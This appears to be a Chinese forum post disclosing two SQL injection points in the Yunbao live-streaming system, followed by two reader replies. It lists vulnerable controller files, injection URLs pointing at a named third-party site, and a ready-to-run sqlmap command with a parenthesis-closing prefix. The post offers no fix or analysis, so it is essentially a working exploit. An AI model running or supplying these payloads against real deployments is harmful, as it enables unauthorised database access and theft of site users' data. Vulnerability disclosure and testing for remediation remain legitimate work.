云豹直播系统两处注入漏洞

90_

注入一:
文件位置:
/application/Home/Controller/PlaybackController.class.php



注入链接:

[AppleScript] 查看源码 复制代码

http://www.hedysx.com/index.php?g=Home&m=Playback&touid=1

、
注入二:
文件位置:
/application/Appapi/Controller/VideoController.class.php



注入链接:

[AppleScript] 查看源码 复制代码

http://www.hedysx.com/index.php?g=Appapi&m=Video&videoid=1

注意闭合问题：

[AppleScript] 查看源码 复制代码

sqlmap -u 'http://www.xxxxxx.cn/index.php?g=Appapi&m=Video&videoid=1*' --prefix "1)" --force-ssl -v3

danko

啧 学到了 这个姿势还真厉害

热心网友6

感谢分享这两处SQL注入漏洞，分析得很清楚。文件路径和注入点都指出来了，对测试和修复很有参考价值。特别是第二处需要闭合括号的细节，不看这个直接跑sqlmap可能还真测不出来。 不知道这两处漏洞在最新版本里是否已经修复？如果官方还没出补丁，建议尽快联系他们或自己加参数过滤。另外，如果方便的话，能否补充一下受影响的版本范围？这样大家好确认自己用的版本有没有风险。